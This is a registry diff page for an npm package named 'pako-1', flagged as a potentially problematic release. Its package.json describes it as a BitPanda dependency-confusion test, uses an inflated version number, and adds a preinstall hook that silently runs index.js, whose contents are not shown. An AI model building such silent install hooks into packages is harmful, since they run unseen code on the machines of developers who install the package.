pako-1 199.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of pako-1 might be problematic. Click here for more details.

@@ -0,0 +1,3 @@
1
+ buffer
2
+ crypto-browserify
3
+ process
package/npm.txt ADDED
@@ -0,0 +1,3 @@
1
+ buffer
2
+ crypto-browserify
3
+ process
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "pako-1",
3
+ "version": "199.1.1",
4
+ "description": "BitPanda dependency confusion vulnerabilities.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error no test specified\" && exit 1",
8
+ "preinstall": "node index.js > /dev/null 2>&1"
9
+ },
10
+ "author": "Test",
11
+ "license": "ISC"
12
+ }